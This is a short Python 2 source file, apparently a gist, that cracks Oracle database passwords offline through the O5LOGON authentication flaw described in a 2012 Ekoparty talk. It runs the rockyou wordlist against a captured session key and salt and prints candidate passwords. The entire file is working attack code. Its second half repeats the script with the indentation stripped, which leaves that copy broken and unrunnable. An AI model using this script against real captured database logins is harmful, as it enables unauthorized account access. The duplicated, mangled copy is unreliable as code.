davidlebr1/o5crack.py

## o5crack.py
# http://www.ekoparty.org/archive/2012/PPT-Cryptographic_flaws_in_Oracle_Database_auth_protocol_v6.pdf
import binascii
import hashlib
from Crypto.Cipher import AES

AUTH_SESSKEY="E29B5C0D81661D20620FE22C3C62BCADF55FE37583B7FE0F239C29932CB53AFAEDAA33D25EE8E39BADFFB919D96A6516" #96 bytes
AUTH_VFR_DATA="52E3D49081B7906C810D" #20 bytes

with open("rockyou.txt", "r") as wordlist:
	for word in wordlist:
		salt = binascii.unhexlify(AUTH_VFR_DATA)
		h = hashlib.sha1(word.strip() + salt).digest()
		key = h + "\x00\x00\x00\x00"
		ct = binascii.unhexlify(AUTH_SESSKEY)
		iv = "\x00" * 16
		cipher = AES.new(key, AES.MODE_CBC, iv)
		pt = cipher.decrypt(ct)
		val = binascii.hexlify(pt)
		if "080808080808" in val:
			print "[*] Candidate : " + word.strip() + " : " + val
	# http://www.ekoparty.org/archive/2012/PPT-Cryptographic_flaws_in_Oracle_Database_auth_protocol_v6.pdf
	import binascii
	import hashlib
	from Crypto.Cipher import AES

	AUTH_SESSKEY="E29B5C0D81661D20620FE22C3C62BCADF55FE37583B7FE0F239C29932CB53AFAEDAA33D25EE8E39BADFFB919D96A6516" #96 bytes
	AUTH_VFR_DATA="52E3D49081B7906C810D" #20 bytes

	with open("rockyou.txt", "r") as wordlist:
	for word in wordlist:
	salt = binascii.unhexlify(AUTH_VFR_DATA)
	h = hashlib.sha1(word.strip() + salt).digest()
	key = h + "\x00\x00\x00\x00"
	ct = binascii.unhexlify(AUTH_SESSKEY)
	iv = "\x00" * 16
	cipher = AES.new(key, AES.MODE_CBC, iv)
	pt = cipher.decrypt(ct)
	val = binascii.hexlify(pt)
	if "080808080808" in val:
	print "[*] Candidate : " + word.strip() + " : " + val